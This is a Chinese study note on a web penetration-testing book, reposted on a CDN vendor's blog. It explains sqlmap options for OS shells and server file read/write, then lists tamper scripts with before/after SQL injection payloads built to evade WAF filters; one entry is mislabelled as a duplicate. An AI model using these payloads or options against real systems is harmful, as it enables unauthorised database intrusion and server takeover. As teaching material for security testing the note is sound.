《Web安全攻防渗透测试实战指南》学习笔记(二)

1>探测等级: –level 5

 

–level 5 指的是需要执行的测试等级

 

一共有5个等级(1-5) 不加 level 时,默认是1

5级包含的payload最多,会自动破解出cookie、XFF等头部注入,相对应他的速度也比较慢。

 

level=2 http cookie会测试

level=3 http user-agent/referer头会测试

 

在不能确定哪个payload或参数为注入点时,建议使用高的level值。

 

2>当前用户是否为管理权限: –is -dba

 

返回true则为是管理权限,否则不是

 

3>列出数据库管理员角色: –roles

 

注意:只适用于当前数据库是oracle的时候

 

4>HTTP Referer头: –referer

 

当level设置为3时,会尝试referer注入

 

也可以使用referer命令来欺骗 例如:

–referer 域名(https://www.baidu.com)

 

5>运行自定义sql语句:–sql -shell

 

例如:sqlmap.py -u “http://192.168.1.xxx/sql1/union.php?id=1” –sql -shell

 

 

6>运行任意操作系统命令: –os -cmd  

                                           –os -shell

 

 

用 –os -shell参数可以模拟一个真实的shell,输入想执行的命令

支持asp、asp.net、jsp、php四种语言

 

7>从数据库服务器中读取文件  –file-read    ” 路径“

 

 

8>上传文件到数据库服务器中  –file-write

                                                –file-dest

 

用于写入本地文件到服务器中,当数据库为mysql、postgresql、microsoft sql server,且当前用户有权限使用特定函数时,上传的文件可以是文本也可以是二进制文件。

 

 

 

6.sqlmap自带绕过脚本tamper的讲解

 

sqlmap在默认情况下除了使用char()函数防止出现单引号,没有对注入的数据进行修改。

tamper参数对数据做修改来绕过WAF等设备,其中大部分脚本主要用正则模块替换攻击载荷字符编码的方式尝试绕过WAF的检测规则。

 

常用的tamper脚本:

 

apostrophemask.py

适用数据库:ALL 

作用:将引号替换为utf-8,用于过滤单引号 

使用脚本前:tamper(“1 AND ‘1’=’1”) 

使用脚本后:1 AND %EF%BC%871%EF%BC%87=%EF%BC%871

 

base64encode.py

适用数据库:ALL 

作用:替换为base64编码 

使用脚本前:tamper(“1′ AND SLEEP(5)#”) 

使用脚本后:MScgQU5EIFNMRUVQKDUpIw==

 

multiplespaces.py

适用数据库:ALL 

作用:围绕sql关键字添加多个空格 

使用脚本前:tamper(‘1 UNION SELECT foobar’) 

使用脚本后:1 UNION SELECT foobar

 

space2plus.py

适用数据库:ALL 

作用:用加号替换空格 

使用脚本前:tamper(‘SELECT id FROM users’) 

使用脚本后:SELECT+id+FROM+users

 

nonrecursivereplacement.py

适用数据库:ALL 

作用:作为双重查询语句,用双重语句替代预定义的sql关键字(适用于非常弱的自定义过滤器,例如将select替换为空) 

使用脚本前:tamper(‘1 UNION SELECT 2–‘) 

使用脚本后:1 UNIOUNIONN SELESELECTCT 2–

 

space2randomblank.py

适用数据库:ALL 

作用:将空格替换为其他有效字符 

使用脚本前:tamper(‘SELECT id FROM users’) 

使用脚本后:SELECT%0Did%0DFROM%0Ausers

 

unionalltounion.py

适用数据库:ALL 

作用:将union allselect 替换为unionselect 

使用脚本前:tamper(‘-1 UNION ALL SELECT’) 

使用脚本后:-1 UNION SELECT

 

securesphere.py

适用数据库:ALL 

作用:追加特定的字符串 

使用脚本前:tamper(‘1 AND 1=1’) 

使用脚本后:1 AND 1=1 and ‘0having’=’0having’

 

space2dash.py

适用数据库:ALL 

作用:将空格替换为–,并添加一个随机字符串和换行符 

使用脚本前:tamper(‘1 AND 9227=9227’) 

使用脚本后:1–nVNaVoPYeva%0AAND–ngNvzqu%0A9227=9227

 

space2mssqlblank.py

适用数据库:Microsoft SQL Server 

测试通过数据库:Microsoft SQL Server 2000、Microsoft SQL Server 2005 

作用:将空格随机替换为其他空格符号(‘%01’, ‘%02’, ‘%03’, ‘%04’, ‘%05’, ‘%06’, ‘%07’, ‘%08’, ‘%09’, ‘%0B’, ‘%0C’, ‘%0D’, ‘%0E’, ‘%0F’, ‘%0A’) 

使用脚本前:tamper(‘SELECT id FROM users’) 

使用脚本后:SELECT%0Eid%0DFROM%07users

 

between.py

测试通过数据库:Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0 

作用:用NOT BETWEEN 0 AND #替换> 

使用脚本前:tamper(‘1 AND A > B–‘) 

使用脚本后:1 AND A NOT BETWEEN 0 AND B–

 

percentage.py

适用数据库:ASP 

测试通过数据库:Microsoft SQL Server 2000, 2005、MySQL 5.1.56, 5.5.11、PostgreSQL 9.0 

作用:在每个字符前添加一个% 

使用脚本前:tamper(‘SELECT FIELD FROM TABLE’) 

使用脚本后:%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

 

sp_password.py

适用数据库:MSSQL 

作用:从T-SQL日志的自动迷糊处理的有效载荷中追加sp_password 

使用脚本前:tamper(‘1 AND 9227=9227– ‘) 

使用脚本后:1 AND 9227=9227– sp_password

 

charencode.py

测试通过数据库:Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0 

作用:对给定的payload全部字符使用url编码(不处理已经编码的字符) 

使用脚本前:tamper(‘SELECT FIELD FROM%20TABLE’) 

使用脚本后:%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45

 

randomcase.py

测试通过数据库:Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0 

作用:随机大小写 

使用脚本前:tamper(‘INSERT’) 

使用脚本后:INseRt

 

charunicodeencode.py

适用数据库:ASP、ASP.NET 

测试通过数据库:Microsoft SQL Server 2000/2005、MySQL 5.1.56、PostgreSQL 9.0.3 

作用:适用字符串的unicode编码 

使用脚本前:tamper(‘SELECT FIELD%20FROM TABLE’) 

使用脚本后:%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045

 

space2comment.py

测试通过数据库:Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0 

作用:将空格替换为/**/ 

使用脚本前:tamper(‘SELECT id FROM users’) 

使用脚本后:SELECT/**/id/**/FROM/**/users

 

equaltolike.py

测试通过数据库:Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5 

作用:将=替换为LIKE 

使用脚本前:tamper(‘SELECT * FROM users WHERE id=1’) 

使用脚本后:SELECT * FROM users WHERE id LIKE 1

 

equaltolike.py

测试通过数据库:MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0 

作用:将>替换为GREATEST,绕过对>的过滤 

使用脚本前:tamper(‘1 AND A > B’) 

使用脚本后:1 AND GREATEST(A,B+1)=A

 

ifnull2ifisnull.py

适用数据库:MySQL、SQLite (possibly)、SAP MaxDB (possibly) 

测试通过数据库:MySQL 5.0 and 5.5 

作用:将类似于IFNULL(A, B)替换为IF(ISNULL(A), B, A),绕过对IFNULL的过滤 

使用脚本前:tamper(‘IFNULL(1, 2)’) 

使用脚本后:IF(ISNULL(1),2,1)

 

modsecurityversioned.py

适用数据库:MySQL 

测试通过数据库:MySQL 5.0 

作用:过滤空格,使用mysql内联注释的方式进行注入 

使用脚本前:tamper(‘1 AND 2>1–‘) 

使用脚本后:1 /*!30874AND 2>1*/–

 

space2mysqlblank.py

适用数据库:MySQL 

测试通过数据库:MySQL 5.1 

作用:将空格替换为其他空格符号(‘%09’, ‘%0A’, ‘%0C’, ‘%0D’, ‘%0B’) 

使用脚本前:tamper(‘SELECT id FROM users’) 

使用脚本后:SELECT%0Bid%0DFROM%0Cusers

 

modsecurityzeroversioned.py

适用数据库:MySQL 

测试通过数据库:MySQL 5.0 

作用:使用内联注释方式(/*!00000*/)进行注入 

使用脚本前:tamper(‘1 AND 2>1–‘) 

使用脚本后:1 /*!00000AND 2>1*/–

 

space2mysqldash.py

适用数据库:MySQL、MSSQL 

作用:将空格替换为 — ,并追随一个换行符 

使用脚本前:tamper(‘1 AND 9227=9227’) 

使用脚本后:1–%0AAND–%0A9227=9227

 

bluecoat.py

适用数据库:Blue Coat SGOS 

测试通过数据库:MySQL 5.1,、SGOS 

作用:在sql语句之后用有效的随机空白字符替换空格符,随后用LIKE替换= 

使用脚本前:tamper(‘SELECT id FROM users where id = 1’) 

使用脚本后:SELECT%09id FROM users where id LIKE 1

 

versionedkeywords.py

适用数据库:MySQL 

测试通过数据库:MySQL 4.0.18, 5.1.56, 5.5.11 

作用:注释绕过 

使用脚本前:tamper(‘1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#’) 

使用脚本后:1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#

 

halfversionedmorekeywords.py

适用数据库:MySQL < 5.1 

测试通过数据库:MySQL 4.0.18/5.0.22 

作用:在每个关键字前添加mysql版本注释 

使用脚本前:tamper(“value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’=’QDWa”) 

使用脚本后:value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND ‘QDWa’=’QDWa

 

space2morehash.py

适用数据库:MySQL >= 5.1.13 

测试通过数据库:MySQL 5.1.41 

作用:将空格替换为#,并添加一个随机字符串和换行符 

使用脚本前:tamper(‘1 AND 9227=9227’) 

使用脚本后:1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227

 

apostrophenullencode.py

适用数据库:ALL 

作用:用非法双字节Unicode字符替换单引号 

使用脚本前:tamper(“1 AND ‘1’=’1”) 

使用脚本后:1 AND %00%271%00%27=%00%271

 

appendnullbyte.py

适用数据库:ALL 

作用:在有效载荷的结束位置加载null字节字符编码 

使用脚本前:tamper(‘1 AND 1=1’) 

使用脚本后:1 AND 1=1%00

 

chardoubleencode.py

适用数据库:ALL 

作用:对给定的payload全部字符使用双重url编码(不处理已经编码的字符) 

使用脚本前:tamper(‘SELECT FIELD FROM%20TABLE’) 

使用脚本后:%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545

 

unmagicquotes.py

适用数据库:ALL 

作用:用一个多字节组合%bf%27和末尾通用注释一起替换空格 

使用脚本前:tamper(“1′ AND 1=1”) 

使用脚本后:1%bf%27 AND 1=1–

 

randomcomments.py

适用数据库:ALL 

作用:用注释符分割sql关键字 

使用脚本前:tamper(‘INSERT’) 

使用脚本后:I/**/N/**/SERT

 

 

 

原文链接:https://www.cnblogs.com/0yst3r-2046/p/11012714.html

原创文章,作者:优速盾-小U,如若转载,请注明出处:https://www.cdnb.net/bbs/archives/17262

(0)
上一篇 2023年1月20日 10:19
下一篇 2023年1月20日

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注

优速盾注册领取大礼包www.cdnb.net
/sitemap.xml